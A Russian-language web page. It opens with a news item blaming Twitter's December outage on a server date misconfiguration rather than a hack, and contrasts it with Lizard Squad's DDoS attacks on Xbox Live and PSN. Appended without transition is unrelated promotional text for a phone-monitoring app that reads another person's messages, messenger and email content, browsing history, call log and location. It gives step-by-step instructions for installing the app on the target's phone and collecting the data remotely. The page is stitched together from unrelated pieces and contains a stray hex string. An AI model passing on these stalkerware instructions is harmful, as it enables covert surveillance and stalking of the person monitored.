Причиной сбоя в работе Twitter стала ошибка сервера

29dd80cd431abd717956d12a45682ee0Проблема возникла в конце декабря (28 числа), но причины были обнародованы лишь теперь. С неполадками в работе микроблога столкнулись многие пользователи, особенно использующие TweetDeck для платформы Android. Судя по их комментариями в Сети, публиковавшиеся твиты имели дату как будто год назад. Встречалась и ошибка авторизации, в результате которой невозможно было ни читать ленту, ни публиковать посты, ни писать личные сообщения другим пользователям.

Причиной ошибки стал спонтанный сбой микроблога, в итоге многие пользователи не могли авторизоваться на сайте. Ошибка не была результатом какой-то хакерской атаки, а вызвана лишь неправильным настройками серверов. Они стали видеть, что наступил Новый Год, что и вызвало путаницу. Поскольку ошибка носит front-end характер, администрация ресурса оперативно устранила её. Долгое время представители СМИ размышляли о том, что же стало настоящей причиной такого сбоя. И лишь в начале февраля был опубликован официальный пресс-релиз, где разъяснялась суть проблемы.

Аналогичные сбои в работе серверов наблюдали в конце года Xbox Live и PlayStation Network, но там причины оказались совершенно иными. Хакерская группировка Lizard Squad провела целенаправленную атаку на серверы, используя технологии DDoS. В итоге юзеры длительное время не могли воспользоваться своими учётными записями, а также принимать участие в многопользовательских играх. Активисты хакерской группы Anonymous внимательно следили за ситуацией с Twitter. Они подтвердили, что группа Lizard Squad не имеет ни малейшего отношения к сбою.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.